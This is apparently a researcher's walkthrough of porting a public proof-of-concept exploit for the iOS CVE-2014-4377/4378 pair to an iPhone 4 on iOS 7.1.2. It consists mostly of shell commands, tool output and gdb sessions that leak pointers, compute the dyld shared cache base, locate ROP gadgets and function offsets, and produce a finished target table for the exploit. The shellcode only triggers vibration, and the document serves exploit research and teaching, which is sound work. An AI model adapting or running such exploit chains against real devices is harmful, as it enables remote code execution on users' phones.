Porting the PoC exploit for CVE-2014-4377 and CVE-2014-4378 to the iPhone4 with firmware version IOS7.1.2.

This is an exercise of the PORTING instructions detailed here .

First get the dyld_shared_chache of the target

iPhone3,1_7.1.2_11D257 $ scp root@$IPHONE4:/System/Library/Caches/com.apple.dyld/dyld_shared_cache_armv7

iPhone3,1_7.1.2_11D257 $ ls -al dyld_shared_cache_armv7
-rw-r--r-- 1 felipe felipe 315952666 Sep 23 00:05 dyld_shared_cache_armv7

iPhone3,1_7.1.2_11D257 $ sha1sum dyld_shared_cache_armv7
21062c1351606d71f168398d3ad8ed8035c040cd  dyld_shared_cache_armv7

Navigate to the exploit

Go to your MobileSafari and navigate to the exploit. You may use the online version.
It will fail but it will show you usefull info.
scroll down a litle a find the hex values of 3 similar pointers..
in this case there are:
71 45 27 2f c5 45 27 2f c5 46 27 2f

Note it should vary depending on several things.

Calculate the base address

Download and use calcbase.py
iPhone3,1_7.1.2_11D257 $ wget https://raw.githubusercontent.com/feliam/CVE-2014-4378/master/tools/calcbase.py
--2014-10-06 23:57:15--  https://raw.githubusercontent.com/feliam/CVE-2014-4378/master/tools/calcbase.py
Resolving raw.githubusercontent.com... 23.235.39.133
Connecting to raw.githubusercontent.com|23.235.39.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 948 [text/plain]
Saving to: ‘calcbase.py’

100%[============================================================================================================>] 948         --.-K/s   in 0s      

2014-10-06 23:57:16 (47.7 MB/s) - ‘calcbase.py’ saved [948/948]

and calculate the dyld base like this...

$ python calcbase.py dyld_shared_cache_armv7 71 45 27 2f c5 45 27 2f c5 46 27 2f
Live Pointers 0x2f274571 0x2f2745c5 0x2f2746c5 
Possible dyld_shared_cache base: 0x2dcdc000
{ "byte0": 0x71, "byte1": 0xc5, "byte2": 0xc5, 
                                                    "version": "$VERSION$", 
                                                    "dyld_shared_cache_offset": 0x01598571 },

Now look for the _trargets dictionary in CVE-2014-4378/index.html and appen the new target. $VERSION$ should be iPhone4-7.1.2 .

{ "byte0": 0x71, "byte1": 0xc5, "byte2": 0xc5, 
                        "version": "iPhone4-7.1.2", 
                        "dyld_shared_cache_offset": 0x01598571 },

Search for the ROP gadgets

We need to search for a bunch of ROP gadgets for the vibrate shellcode. The result will go to CVE-2014-4377/mkCrash.py Download gadgets.py like this...

iPhone3,1_7.1.2_11D257 $ wget https://raw.githubusercontent.com/feliam/CVE-2014-4378/master/tools/gadgets.py
--2014-10-07 00:15:48--  https://raw.githubusercontent.com/feliam/CVE-2014-4378/master/tools/gadgets.py
Resolving raw.githubusercontent.com... 23.235.39.133
Connecting to raw.githubusercontent.com|23.235.39.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4416 (4.3K) [text/plain]
Saving to: ‘gadgets.py’

100%[============================================================================================================>] 4,416       --.-K/s   in 0.002s  

2014-10-07 00:15:49 (1.72 MB/s) - ‘gadgets.py’ saved [4416/4416]

then run it...

iPhone3,1_7.1.2_11D257 $ python gadgets.py dyld_shared_cache_armv7
To get JIT pointer address disassembled the following binary code (http://onlinedisassembler.com/odaweb/) 
    4ff60420c0f61c20
Get $CONSTANT$ from the disassembly and do the following calculation:
    hex( $CONSTANT$ + 0x023c2bac)

              "$VERSION$" : {   "gadget0": 0x0c23d008 + dyld_shared_cache,
                                "gadget1": 0x015b7d47 + dyld_shared_cache,
                                "gadget2": 0x002f70ff + dyld_shared_cache,
                                "gadget3": 0x00118e6b + dyld_shared_cache,
                                "gadget4": 0xffffffff + dyld_shared_cache,
                                "gadget5": 0x016070a5 + dyld_shared_cache,
                                "jit": 0x41414141 + dyld_shared_cache,
                                "AudioServicesPlaySystemSound":  0x42424242 + dyld_shared_cache,
                                "exit":  0x43434343 + dyld_shared_cache,
                                 },

Fix the JIT thing

Save that for a minute and go to onlinedisassembler with the code 4ff60420c0f61c20

Thus the $CONTANT$ is 0xa1cfa04. So the JIT ROP whould be at 0xa1cfa04 + 0x023c2bac

iPhone3,1_7.1.2_11D257 $ python -c "print hex(0xa1cfa04 + 0x023c2bac)"
0xc5925b0
Up to now replacing $VERSION$ and the calculated JIT pointer we got this:
              "iPhone4-7.1.2" : {
                                "gadget0": 0x0c23d008 + dyld_shared_cache,
                                "gadget1": 0x015b7d47 + dyld_shared_cache,
                                "gadget2": 0x002f70ff + dyld_shared_cache,
                                "gadget3": 0x00118e6b + dyld_shared_cache,
                                "gadget4": 0xffffffff + dyld_shared_cache,
                                "gadget5": 0x016070a5 + dyld_shared_cache,
                                "jit": 0xc5925b0 + dyld_shared_cache,
                                "AudioServicesPlaySystemSound":  0x42424242 + dyld_shared_cache,
                                "exit":  0x43434343 + dyld_shared_cache,
                                 },

And the offsets for AudioServicesPlaySystemSound and exit

We still need the addresses of AudioServicesPlaySystemSound and exit. This is pretty easy to do by IDA or using gdb and some offset calculation.

I'll go the gdb way this time..

iPhone3,1_7.1.2_11D257 $ ssh root@192.168.1.103
root@192.168.1.103's password: 

iphone4:~ root# ./gdb.iphone4 
GNU gdb 6.3.50-20050815 (Apple version gdb-1821) (Fri Jun 29 08:41:41 UTC 2012)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "arm-apple-darwin".

(gdb) attach MobileSafari
Attaching to process 329.
Reading symbols for shared libraries . done
bfd_mach_o_scan: unknown architecture 0x100000c/0x0
Reading symbols for shared libraries ................................................................................................................................................................................................................ done
bfd_mach_o_scan: unknown architecture 0x100000c/0x0
Reading symbols for shared libraries + done
0x39ea1a58 in mach_msg_trap ()

(gdb) p AudioServicesPlaySystemSound
$1 = {} 0x2eac1d94 

(gdb) set $pos=(unsigned)AudioServicesPlaySystemSound&0xfffff000

(gdb) while ( (int) strncasecmp("dyld_v1", $pos, 7) !=0 )
 >set $pos=$pos-0x1000
 >end

(gdb) printf "AudioServicesPlaySystemSound offset: 0x%08x\n", (AudioServicesPlaySystemSound-$pos)|1
AudioServicesPlaySystemSound offset: 0x00de5d95

(gdb) printf "exit offset: 0x%08x\n", (exit-$pos)|1
exit offset: 0x0c149a5d

(gdb) printf "gadget4: 0x%08x\n", (0x39f16e48-$pos)|1
gadget4: 0x0c23ae49


(gdb) detach 
Detaching from process 329.

(gdb) quit
iphone4:~ root# 

Result

And the final product is:

{ "byte0": 0x71, "byte1": 0xc5, "byte2": 0xc5, 
                        "version": "iPhone4-7.1.2", 
                        "dyld_shared_cache_offset": 0x01598571 },
              "iPhone4-7.1.2" : {
                                "gadget0": 0x0c23d008 + dyld_shared_cache,
                                "gadget1": 0x015b7d47 + dyld_shared_cache,
                                "gadget2": 0x002f70ff + dyld_shared_cache,
                                "gadget3": 0x00118e6b + dyld_shared_cache,
                                "gadget4": 0x0c23ae49 + dyld_shared_cache,
                                "gadget5": 0x016070a5 + dyld_shared_cache,
                                "jit": 0xc5925b0 + dyld_shared_cache,
                                "AudioServicesPlaySystemSound":  0x00de5d94 + dyld_shared_cache,
                                "exit":  0x0c149a5c + dyld_shared_cache,
                                 },

For more info on this check the blog post

@feliam